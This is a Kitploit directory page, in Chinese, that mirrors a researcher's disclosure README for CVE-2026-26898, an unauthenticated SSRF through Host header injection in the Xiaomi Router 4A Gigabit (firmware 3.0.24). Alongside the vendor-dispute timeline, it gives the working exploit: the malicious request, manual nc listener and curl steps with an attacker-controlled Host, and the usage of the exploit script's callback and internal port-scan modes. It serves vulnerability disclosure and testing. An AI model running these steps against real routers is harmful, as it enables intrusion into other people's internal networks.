Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection — 小米路由器4A千兆版(固件3.0.24)中通过Host Header注入导致的未认证SSRF —— CVE-2026-26898 | Kitploit
工具/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
漏洞分析漏洞利用Web应用程序漏洞利用网络安全渗透测试红队
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

小米路由器4A千兆版(固件3.0.24)中通过Host Header注入导致的未认证SSRF —— CVE-2026-26898

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1113个月前尚未审核
分享

CVE-2026-26898: 小米路由器4A千兆版 - 通过Host头注入的SSRF漏洞

Vulnerability CVSS Status Vendor

摘要

小米路由器4A千兆版存在服务器端请求伪造(SSRF)漏洞。路由器的Web界面未能验证HTTP Host 头,允许未认证的攻击者强制路由器发起任意出站TCP连接。

字段值
设备小米路由器4A千兆版
固件版本3.0.24(国际版)
CVECVE-2026-26898 (存在争议——详见下方披露状态)
CWECWE-918(服务器端请求伪造)
CVSS 3.18.6(高危)——研究者评估;供应商对严重性存在异议

供应商回应与披露状态

状态:供应商提出异议——此报告未被小米接受。

  • 通过HackerOne提交给小米(报告编号 #3513458),提交日期:2026-01-16。
  • 2026年1月23日,小米将该报告标记为信息性,声称这是已知问题,路由器"仍然依赖代理功能",并将其归类为低风险,不予处理。
  • 研究者立场: 严重性评级存在争议。截至2026年1月,该设备仍在小米官方渠道(mi.com/tr)活跃销售,端点无需认证即可访问,且该SSRF漏洞可进行内部网络扫描并访问信任本地连接的服务。该行为至今未打补丁。

此处使用CVE-2026-26898仅用于追踪;鉴于供应商争议,应视为存在异议/未确认,而非供应商确认。

受影响端点

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

概念验证

截图

漏洞演示

快速测试

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

输出

root@kitploit:~
[*] 正在检查 192.168.31.1 是否存在漏洞...
[*] 本地IP: 192.168.31.235
[*] 测试端口: 44444
[+] 存在漏洞!路由器已回连至 192.168.31.235:44444

手动测试

root@kitploit:~
# 终端1:启动监听器
nc -l 4444

# 终端2:发送恶意请求
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

影响

  • 内部网络扫描:利用路由器作为代理扫描内部网络
  • 绕过防火墙:访问仅限路由器IP访问的服务
  • 攻击链:可与其他漏洞结合实现远程代码执行(RCE)

文件

文件描述
xiaomi_ssrf_exploit.py包含多种模式的完整利用脚本

漏洞利用用法

root@kitploit:~
# 检查是否存在漏洞
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check

# 回调模式
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444

# 端口扫描
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443

时间线

日期事件
2026-01-15发现漏洞;开发PoC
2026-01-16通过HackerOne提交给小米(#3513458)
2026-01-23小米将该报告标记为信息性(低风险,不予修复)
2026-06-03公开公告发布(本仓库)——供应商争议,未打补丁

参考

  • HackerOne 报告 #3513458(已提交小米;关闭为信息性)
  • CWE-918:服务器端请求伪造(SSRF)

免责声明

本利用脚本仅供教育和授权安全测试使用。未经授权访问计算机系统是违法的。

作者

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

下载工具